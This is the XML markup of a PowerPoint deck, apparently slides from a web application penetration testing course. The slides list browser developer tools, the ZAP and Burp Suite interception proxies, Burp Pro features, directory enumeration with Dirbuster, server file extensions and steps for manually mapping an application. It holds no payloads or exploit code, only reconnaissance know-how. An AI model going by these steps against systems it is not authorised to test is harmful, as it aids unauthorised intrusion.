          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5C5196F-B3EE-4690-B424-4ACFDD2D652D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="648234" y="1676400"/>
            <a:ext cx="7888175" cy="4781550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC5B5BB7-B4A7-43F9-B3E6-F4CDD0762768}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8766495" y="1912690"/>
            <a:ext cx="3103927"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err="1"/>
              <a:t>Cntrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + shift + I  Or  F12</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Local storage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JS Console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Cookies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Network recorder</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Page Errors for trouble shooting payloads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23824756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FDDC-DC3E-4F0E-86FE-91A13278430F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB3DB631-E8CF-4ADB-9333-3272E3EE408C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>ZAP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Burp Suite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A579FD0C-CB14-422E-9901-9C8438306DA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6810628" y="2965076"/>
            <a:ext cx="4057143" cy="1180952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C5E9F42-708C-42B2-BE5B-C295C3545A70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7977126" y="1389573"/>
            <a:ext cx="1329045" cy="1322400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39523767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44A2-A7B4-4173-B5EA-B4799A18D0DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BURP PRO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{977ADD2C-41EB-418F-8B7E-CC33A7645FC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Burp Extender</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Retire JS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wsdler</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Burp Spider</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Engagement tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python Scripter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intruder, Sequencer, Repeater</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAD5E509-11DD-4165-A52C-4A75C3A0127C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6886689" y="1153435"/>
            <a:ext cx="4830297" cy="5419493"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="462822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E6032-AAB1-4705-A0BD-1C751CD894E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser and Proxy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB7B3EAF-7E6F-4FD5-9BE0-0EF285169470}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="58536" y="2341756"/>
            <a:ext cx="12056990" cy="3784408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1829378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95518-6952-44E6-9F39-D23B713BB931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Directory enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43B5CB05-2D74-4480-87D6-3091B4977958}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Dirbuster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Burp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00118AB1-8864-421D-A0C0-4086D60E88CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5689600" y="1715130"/>
            <a:ext cx="6035332" cy="4296103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34490903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0B466-7DE9-4D33-A830-5378E414A41C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File Extensions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99E903EB-7FF1-44F8-815A-AD9681D4C65B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1612489"/>
            <a:ext cx="5692877" cy="5098027"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>asp — Microsoft Active Server Pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aspx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — Microsoft ASP.NET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — Java Server Pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cfm — Cold Fusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>php — the PHP language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>d2w — WebSphere</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pl — the Perl language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — the Python language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — usually compiled native code (C or C++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nsf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ntf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — Lotus Domino</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AVI — Audio/Video Interleaved</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSS — Cascading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>StyleSheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOC — Microsoft Word </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DOCument</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EXE — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EXEcutable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GIF — Graphics Interchange Format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B87E1171-F07A-4033-A3C2-58D34EB0334B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5814143" y="1612489"/>
            <a:ext cx="6299199" cy="4899637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML, HTM — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HyperText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Markup Language file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JPG, JPEG — Joint Photographic Experts Group file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MIDI, MID — Musical Instrument Digital Interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MP3 — MPEG Layer 3 sound file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MPEG, .MPG — Motion Picture Experts Group file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MOV, .QT — QuickTime </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MOVie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PDF — Portable Document Format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PNG — Portable Network Graphics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RAM — Real Audio Movie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RAR — RAR archive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TIFF — Tagged Image File Format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TXT — Text file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WAV — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WAVe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sound file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ZIP — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ZIPped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TAR, TBZ, TGZ, BZ, GZ, XZ — Linux Archive file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BAK - Backup file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OLD - OLD file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37966129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99DA-81AC-47B5-8FC1-ADCF66F71463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manual Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E674A2D-30E4-4C42-9248-8706DFA8D9B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User’s Perspective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify technologies and/or verify technologies in use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create a base line of request and response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Model out procedural flows (example shopping cart, signing up for an account, password reset)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architectural software development used? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18482519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99DA-81AC-47B5-8FC1-ADCF66F71463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manual Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E674A2D-30E4-4C42-9248-8706DFA8D9B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
